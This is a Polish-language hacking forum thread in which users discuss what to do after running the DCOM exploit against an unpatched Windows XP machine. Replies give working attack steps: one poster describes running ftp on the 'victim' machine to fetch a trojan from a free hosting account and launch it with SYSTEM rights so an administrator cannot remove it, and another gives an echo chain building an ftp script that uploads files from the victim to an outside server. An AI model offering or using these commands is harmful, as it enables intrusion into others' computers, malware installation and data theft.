Exploit dcom na Win XP

[Destruktor]

chcizłem sprobowac czegos nowego. Chodzi o exploita dcom na xp. Probowalem sie tym pobawic. Mam w domu drugiego kompa z Win Xp bez zadnych łatek. Robilem wszystko jak w opisie na stronie Team - Nas i chyba nawt wszystko zrobilem dobrze ale co dalej. Jak np skopiowac plik z dysku ofiary. Jakich komend urzywac, dosowych? Jezeli dosowych to jaka jest skladnia na skopiowanie pliku od ofiary. Na czym wogole polega to uzykanie praw administratora i jak to wykorzystac?

 

[Solari]

heh, zawsze uzyskujesz konsole z takim systemem operacyjny (nie wiem czy dobrze sie wyrazam) jaki jest na kompie ofiary.. a wiec jesli jest to winda a wiec oczywistym jest ze masz dostepne komendy DOS'a...
no a chyba nei pwoeisz mi ze nie znasz komend dos....

wklep se: help /? <- to bedziesz mial komendy...
a pozniej : komenda /? i dostajesz info na temat danej komendy... np:
copy /? <- da ci info o komendzie copy 8)

co do DCOM to zycze powodzenia.... mi jakos binshell wariowal i wlasciwie ani lokalnie nie moglem nic z kompa zdalnego skopiowac.. ani z ftp'a nic sciagnac czy uploadowac nie... ehh.... ja ci sie uda to daj znac...

pozdr. 8)

 

[Destruktor]

nie no nie rób ze mnie debila. Znam komendy dos'a. Spoko wiem jak kopiowac pliki pod dosem ale jak skopiowac cos z innego kompa, trzeba podac ip czy jak? Jaka jest składnia np dla komendy dir? Czy wogole jest cos takiego. Przeciez jak walne dir'a to mam moje drzewo plikow. Tak samo nie wiem co zrobic z copy. Czy wogole ide w dobrym kierunku?
Moze ktos mi poda jakies linki zebym sie podszkolil w tym temacie bo przeszukiwalem forum (nie tylko to) i nic konkretnego nie znalazlem. Przewaznie znajduje tylko exploity bez instrukcji. Wim ze pewnie z kazdym postepuje sie podobnie ale przeciez kiedys musi byc ten pierwszy raz.

 

[I_v0]

wez sobie chlopaku na zdalnym systemie wywolaj komende ftp
np.
ftp onet.pl (wczesniej na onet.pl zaloz sobie konto ze strona i zgraj tam trojana).
user:
pass:
~/>cd trojanek
~/trojanek/>get pliczek.exe
~/trojanek/>bye
Connection to onet.pl closed

Cos takiego mialem mniej wiecej na mysli (zastosowalem wiele skrotow myslowych). Dalej odpalasz sciagniety pliczek i laczysz sie juz normalnie z trojanem na kompie ofiary
Prawde mowiac nigdy tego nie robilem (aczkolwiek wiem ze dcom32 dziala bo probowalem go) to logika podpowiada mi ze myk z tym ftp powinien dzialac ;>

Pamietaj ze masz na zdalnym XPeku uprawnienia zdaje sie SYSTEM, wiec nawet Admin jesli bedzie chcial wylaczyc w jakis sposob trojanka to nie bardzo mu sie uda, pozniewaz nikt nie ma w XP uprawnien SYSTEM (i daltego sie wszystko (cenzura) - ale to tak przy okazji).

 

[Luc3k]

pewnie ze myk z ftpem dziala, z doswiadczenia wiem, ze to pujdzie, oczywiscie po owczesnym zalozeniu konta na onecie czy gdziekolwiek:echo open ftp.republika.pl>>plik&echo login>>plik&echo login>>plik&echo user login haslo>>plik&echo put nazwa_pliku>>plik&echo bye>>plik

ftp -slik

a komendy sa normalne takie same jak w dosie, dir wywoluje nie twoje drzewo katalogow tylko drzewo na kompie ktprym jestes.